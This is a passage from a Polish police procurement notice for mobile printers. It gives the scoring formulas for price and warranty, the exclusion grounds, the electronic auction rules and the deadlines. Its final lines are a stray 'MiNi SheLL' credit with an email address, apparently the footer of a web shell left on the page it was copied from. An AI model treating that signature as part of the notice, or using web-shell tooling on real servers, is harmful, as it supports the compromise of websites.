miesięcy.<br/>Ocena będzie dokonywana poprzez porównanie okresu gwarancji w badanej ofercie do najdłuższego zaoferowanego okresu<br/>gwarancji na sprzęt spośród ofert niepodlegających odrzuceniu. Punkty za kryterium będą obliczone wg wzoru:<br/>B=(G bad)/(G max) x 40 pkt<br/>gdzie:<br/>B - ilość pkt uzyskanych przez Wykonawcę<br/>G bad –okres gwarancji oferty badanej (w miesiącach)<br/>G max – najwyższy spośród zaoferowanych okresów gwarancji (w miesiacach)<br/>Zamawiający wymaga, aby okres rękojmi był równy okresowi zaoferowanej gwarancji na sprzęt.<br/>2.4. Zamawiający przewiduje przeprowadzenie aukcji elektronicznej, gdzie jedynym ruchomym kryterium jest „cena”, pozostałe<br/>kryteria są kryteriami stałymi. W przypadku braku możliwości przeliczenia zgodnie z wylicytowaną kwotą oferty po aukcji<br/>Zamawiający dokona poprawy złożonego formularza cenowego po aukcji, na podstawie art. 223 ust. 2 pkt 2 ustawy Pzp tj. zostanie<br/>poprawiona jako omyłka rachunkowa</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na sprzęt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup wraz z dostawą drukarek mobilnych (5 szt.) zgodnie z opisem przedmiotu zamówienia<br/>stanowiącym załącznik nr 3C do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30232100-5 - Drukarki i plotery</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze najkorzystniejszą ofertę spośród ofert niepodlegających odrzuceniu na<br/>podstawie kryteriów:<br/>Y = A+B<br/>Y – Suma punktów badanej ważnej oferty<br/>A – Cena brutto oferty – max. 60 pkt.<br/>B – Gwarancja na asortyment – max. 40 pkt.<br/>2. Ocena ofert:<br/>2.1 Kryterium A – cena brutto oferty. Ocena będzie dokonywana poprzez porównanie cen brutto zawartych w ofertach do ceny<br/>najniższej spośród ofert niepodlegających odrzuceniu.<br/>Punkty za kryterium będą obliczone wg wzoru:<br/>najniższa oferowana cena brutto z ważnych ofert<br/>A = ------------------------------------------------------------------------x 60 pkt<br/>cena brutto badanej oferty<br/>2.1.1.Wyznaczenie wartości punktów:<br/>a) ważna oferta z najniższą ceną oferty brutto otrzyma maksymalną liczbę punktów tj.: 60.<br/>b) inne ważne oferty z podaną sumą wartości tabeli stałej zostaną przeliczone wg. powyższego wzoru.<br/>c) jeżeli ważne oferty cenowe po przeliczeniu wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>2.1.2. Zasady przyznawania punktów:<br/>a) Wartości liczone będą do dwóch miejsc po przecinku.<br/>b) Otrzymana tak wartość podstawiona zostanie do wzoru na wyliczenie ogólnej liczby punktów.<br/>kryterium B – oferowany okres gwarancji na sprzęt.<br/>W ramach kryterium „Okres gwarancji” ocena będzie dokonywana na podstawie deklaracji zawartej w Formularzu ofertowym<br/>zgodnie z poniższymi zasadami: .<br/>Okres gwarancji – oznacza okres liczony od daty dostawy sprzętu potwierdzonej protokołem, w którym Wykonawca w ramach<br/>wynagrodzenia za wykonanie przedmiotu zamówienia zapewni Zamawiającemu gwarancję jakości sprzętu zgodnie z SWZ, w<br/>szczególności zgodnie ze wzorem umowy, w tym zapewniając usługi usunięcia zidentyfikowanych wad w zakresie zrealizowanych<br/>świadczeń na warunkach określonych w umowie.<br/>Wykonawca winien zadeklarować zaokrągloną do pełnego miesiąca wartość z przedziału od 24 do 60 miesięcy<br/>Zadeklarowanie okresu gwarancji krótszego niż 24 miesiące skutkuje odrzuceniem oferty, podanie wartości większej od 60 miesięcy,<br/>a innej niż wyżej wymienione skutkuje przyjęciem jej do umowy, natomiast do oceny ofert zostanie przyjęta największa z mniejszych<br/>od niej dopuszczalnych wartości całkowitych tj. 60 miesięcy.<br/>Brak określenia okresu gwarancji w Formularzu ofertowym będzie uznany przez Zamawiającego za deklarację minimalnego okresu<br/>gwarancji przyjętego przez Zamawiającego tj. 24 miesięcy.<br/>Ocena będzie dokonywana poprzez porównanie okresu gwarancji w badanej ofercie do najdłuższego zaoferowanego okresu<br/>gwarancji na sprzęt spośród ofert niepodlegających odrzuceniu. Punkty za kryterium będą obliczone wg wzoru:<br/>B=(G bad)/(G max) x 40 pkt<br/>gdzie:<br/>B - ilość pkt uzyskanych przez Wykonawcę<br/>G bad –okres gwarancji oferty badanej (w miesiącach)<br/>G max – najwyższy spośród zaoferowanych okresów gwarancji (w miesiacach)<br/>Zamawiający wymaga, aby okres rękojmi był równy okresowi zaoferowanej gwarancji na sprzęt.<br/>2.4. Zamawiający przewiduje przeprowadzenie aukcji elektronicznej, gdzie jedynym ruchomym kryterium jest „cena”, pozostałe<br/>kryteria są kryteriami stałymi. W przypadku braku możliwości przeliczenia zgodnie z wylicytowaną kwotą oferty po aukcji<br/>Zamawiający dokona poprawy złożonego formularza cenowego po aukcji, na podstawie art. 223 ust. 2 pkt 2 ustawy Pzp tj. zostanie<br/>poprawiona jako omyłka rachunkowa</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na sprzęt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca wraz z ofertą składa dokumenty i oświadczenia wskazane niżej<br/>1.1.1 Oświadczenie Wykonawcy/podwykonawcy/podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu na podstawie art.<br/>125 ust. 1 ustawy Pzp oraz art. 7 ust. 1 ustawy z 13 kwietnia 2022 o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2023 poz. 1497), aktualnego na dzień<br/>składania ofert i zgodnego ze wzorem stanowiącym załącznik nr 4 do SWZ. Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia na dzień składania ofert.<br/>1.1.2 W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>1.1.3 Jeżeli Wykonawca nie złożył podmiotowych środków dowodowych lub złożone podmiotowe środki dowodowe są niekompletne,<br/>Zamawiający w trybie art. 128 jednokrotnie wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 2.1. Zamawiający wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych w postaci:<br/>- karty technicznej produktu lub innego dokumentu potwierdzającego, że zaoferowany sprzęt spełnia minimalne wymagania<br/>Zamawiającego wskazane w załączniku nr 3A i/lub 3B i/lub 3C do SWZ.<br/>2.2.Zgodnie z art. 107 ust 2 ustawy PZP Jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone<br/>przedmiotowe środki dowodowe są niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia lub wyjaśnienia w<br/>wyznaczonym terminie <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wszystkie przedmiotowe środki dowodowe podlegają uzupełnieniu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.3.1.) Adres internetowy aukcji: <span class="normal">https://slaska-policja.eb2b.com.pl/</span></h3> <h3 class="mb-0">6.3.2.) Opis aukcji elektronicznej: </h3> Zamawiający przewiduje przeprowadzenie jednoetapowej aukcji elektronicznej, jeżeli zostaną złożone co najmniej 2 oferty<br/>niepodlegające odrzuceniu (art. 308 ust. 1 ustawy).<br/>1. Zamawiający planuje zakończenie aukcji w okresie dwóch dni roboczych.<br/>2. Zaproszenie do udziału w aukcji elektronicznej zostanie przekazane wykonawcy za pośrednictwem platformy eb2b z co<br/>najmniej dwudniowym wyprzedzeniem (dwa dni robocze).<br/>3. Aukcja zostanie przeprowadzona w module aukcyjnym Platformy Zakupowej KWP w Katowicach dostarczonej przez<br/>firmę eB2B na stronie https://slaska-policja.eb2b.com.pl.<br/>4. W przypadku gdy podczas aukcji oferty będzie składała inna osoba niż osoba składająca ofertę, do oferty należy dołączyć<br/>pełnomocnictwo z którego będzie wynikać prawo do reprezentowania Wykonawcy w aukcji elektronicznej.<br/>5. Zmiany osoby, która będzie składała oferty (postąpienia) podczas aukcji elektronicznej można dokonać (poprzez<br/>zgłoszenie tego faktu Zamawiającemu za pomocą e-mail) najpóźniej na 24 godziny przed otwarciem aukcji.<br/>6. Oferty podczas aukcji Wykonawca składa za pomocą formularza umieszczonego na platformie zakupowej,<br/>umożliwiającego wprowadzanie niezbędnych danych w trybie bezpośredniego połączenia z tą stroną, opatrzone<br/>bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu pod rygorem<br/>nieważności. Uwaga: Podpisem spełniającym wymogi ustawowe będzie podpis wydawany przez kwalifikowany podmiot<br/>certyfikujący – wpisany do rejestru prowadzonego przez Narodowe Centrum Certyfikacji.<br/>7. Wykonawcy, którzy chcą wziąć udział w aukcji elektronicznej, muszą się zalogować do Platformy Zakupowej. Warunkiem<br/>wzięcia udziału w aukcji elektronicznej jest dysponowanie bezpiecznym podpisem elektronicznym weryfikowanym za<br/>pomocą ważnego kwalifikowanego certyfikatu, bliższych informacji może udzielić Operator Platformy Zakupowej firma<br/>eB2B.<br/>8. W przypadku, gdy Wykonawca będzie posługiwał się podpisem elektronicznym wystawionym przez zagraniczny podmiot<br/>certyfikacyjny, Wykonawca zobowiązany jest dostarczyć Zamawiającemu wzór takiego podpisu, który Zamawiający<br/>przekaże do administratora systemu najpóźniej na tydzień przed otwarciem aukcji.<br/>9. Zamawiający zaprosi Wykonawców do udziału w aukcji elektronicznej i prześle na adres e-mail wskazany przez<br/>Wykonawcę hasło i login w przypadku gdy Wykonawca nie jest zarejestrowany na platformie eB2B oraz wszystkie dane<br/>wskazane w art. 232 ust. 2 ustawy Pzp.<br/>10. Po otrzymaniu zaproszenia Wykonawca zobowiązany jest do zalogowania się na platformie i weryfikacji danych<br/>adresowych oraz podpisu elektronicznego. UWAGA: Należy zwrócić szczególną uwagę na poprawne zdefiniowanie przez<br/>Zamawiającego osoby uprawnionej do składania postąpień.<br/>11. Informacji technicznych i weryfikacji danych oraz podpisów elektronicznych związanych z organizacją aukcji udziela<br/>Operator Platformy Zakupowej pod numerem telefonu (+48) 22 378 39 70, (+48) 22 258 48 61, (+48) 22 428 19 28, e-mail:<br/>helpdesk@eb2b.com.pl.<br/>12. Od momentu otwarcia aukcji elektronicznej do momentu jej zamknięcia każdy Wykonawca może złożyć dowolną liczbę<br/>postąpień. Składane kolejne oferty Wykonawcy podlegają automatycznej ocenie i klasyfikacji zgodnie ze wzorem<br/>wskazanym w zaproszeniu oraz określonym w sekcji XX punkt 2.1 SWZ<br/>13. Jedynym ruchomym kryterium jest „cena”, pozostałe kryteria są kryteriami stałymi. Kryterium oceny ofert w aukcji<br/>elektronicznej zostało określone w sekcji XX punkt 2.1 SWZ. Zamawiający informuje, iż punkty na platformie aukcyjnej są<br/>przez system automatycznie przeliczane i zaokrąglane:<br/>a) w przypadku kryterium „cena” – do trzeciego miejsca po przecinku,14. Termin otwarcia aukcji zostanie podany w zaproszeniach do udziału w aukcji.<br/>15. Aukcja będzie prowadzona zgodnie z czasem wskazanym na platformie. Oznaczenie sprawy ZP–2380–184/2024.<br/>16. Aukcja jest jednoetapowa a jej podstawowy czas trwa przez 30 minut. Aukcja zostanie zamknięta jeżeli w ciągu ostatnich<br/>jej 10 minut w czasie podstawowym lub podczas 10 minutowej dogrywki nie zostanie złożone żadne nowe postąpienie<br/>zaakceptowane przez system na dowolną część w Aukcji. Bieg terminu rozpocznie się wraz z otwarciem aukcji.<br/>17. Zamawiający informuje, iż w sytuacji, gdy w chwili zamknięcia aukcji dwie oferty uzyskają jednakową liczbę punktów,<br/>zwycięzcą aukcji zostanie Wykonawca, który w wyznaczonym czasie jako pierwszy złoży ofertę z najniższą ceną.<br/>18. W toku aukcji elektronicznej Wykonawcy za pomocą formularza umieszczonego na stronie internetowej,<br/>umożliwiającego wprowadzanie niezbędnych danych w trybie bezpośredniego połączenia z tą stroną, składają kolejne<br/>korzystniejsze postąpienia, podlegające automatycznej ocenie i klasyfikacji. Postąpienia, pod rygorem nieważności, składa<br/>się opatrzone bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.<br/>19. Komputer użytkownika Platformy Zakupowej powinien spełniać następujące wymagania:<br/>19.1 być wyposażony w procesor o mocy obliczeniowej minimum 2GHz i posiadać co najmniej 2 GB pamięci RAM;<br/>19.2. posiadać zainstalowany jeden z następujących systemów operacyjnych: MacOS X 10.4, Linux, MS Windows XP lub<br/>nowszy;<br/>19.3. posiadać zainstalowaną jedną z przeglądarek internetowych: Mozilla-Firefox 46+, Chrome 48+, Opera 5+ albo<br/>Microsoft Internet Explorer 10.0 lub nowszą;<br/>19.4. posiadać stałe połączenie z siecią Internet o gwarantowanej szybkości transmisji nie mniejszej niż 512 kb/s.<br/>20. Wykonawca, który zwycięży w aukcji elektronicznej jest zobligowany do dostarczenia w wyznaczonym czasie nowego<br/>formularza ofertowego w oparciu o kwotę uzyskaną podczas aukcji.<br/>21. Wykonawca w trakcie wypełniania formularza cenowego zobowiązany jest do prawidłowego przeliczenia ceny, przy<br/>czym kwota nie może przekroczyć ceny, wylicytowanej w trakcie aukcji elektronicznej. Zamawiający informuje, że<br/>Wykonawca jest zobligowany przy sporządzeniu formularza cenowego po aukcji do przeliczenia każdej pozycji poprzez<br/>procentowe obniżenie ceny tak aby suma wynosiła wylicytowaną kwotę. W przypadku braku możliwości przeliczenia<br/>zgodnie z wylicytowaną kwota Wykonawca może zaoferować kwotę niższą niż wylicytowaną podczas aukcji. W przypadku<br/>błędnego przeliczenia Zamawiający dokona poprawy błędów na podstawie art. 223 ust. 2 pkt 2 ustawy Pzp tj. zostanie<br/>poprawiona jako omyłka rachunkowa.<br/>22. Zamawiający ustala dla wszystkich zadań wysokość minimalnego postąpienia w aukcji elektronicznej na kwotę 500<br/>złotych.<br/>23. W przypadku gdy awaria systemu teleinformatycznego spowoduje przerwanie aukcji elektronicznej, Zamawiający<br/>wyznacza termin kontynuowania aukcji elektronicznej na następny po usunięciu awarii dzień roboczy, o czym poinformuje<br/>Wykonawców za pomocą e-mail z uwzględnieniem stanu ofert po ostatnim zatwierdzonym postąpieniu<br/>24. W celu przeprowadzenia aukcji elektronicznej sprawnie i bez problemów związanych z logowaniem się Wykonawcy na<br/>platformie zakupowej eb2b oraz sprawdzeniem możliwości dokonywania postąpień przez uprawnione osoby, zostanie<br/>przeprowadzona aukcja testowa w dniu poprzedzającym aukcję. <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku wspólnego ubiegania się o zamówienie Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>3. Do oferty należy załączyć pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo.<br/>4. Oryginał pełnomocnictwa opatrzony kwalifikowanym podpisem elektronicznym przez wykonawców ubiegających się<br/>wspólnie o udzielenie zamówienia lub kopia potwierdzona notarialnie, opatrzona kwalifikowanym podpisem elektronicznym<br/>przez notariusza, powinny być załączone do oferty i zawierać w szczególności wskazanie:<br/>a) postępowania o zamówienie publiczne, którego dotyczą,<br/>b) wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem<br/>adresu siedziby,<br/>c) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>5. Wszelka korespondencja prowadzona będzie przez zamawiającego wyłącznie z wyznaczonym pełnomocnikiem.<br/>6. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.<br/>7. W przypadku wspólnego ubiegania się przez Wykonawców o udzielenie zamówienia dokumenty i oświadczenia<br/>wskazane w sekcji VIII składa każdy z Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załącznikiem nr 2 do SWZ -Projektowane postanowienia umowne <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://slaska-policja.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-25 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com